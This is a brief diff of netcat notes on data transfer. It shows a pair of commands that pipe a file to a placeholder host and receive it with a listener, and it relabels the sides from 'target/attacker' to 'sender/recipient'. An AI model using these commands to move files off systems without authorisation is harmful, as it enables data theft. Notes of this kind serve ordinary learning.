Klorsche/command-tool/netcat.md

 *Data Transfer*

-on the target
+on the sender
 ```
 nc receiving.host.com PORT < file_name
 ```
-on the attacker
+on the recipient
 ```
 nc -l PORT > file_name
 ```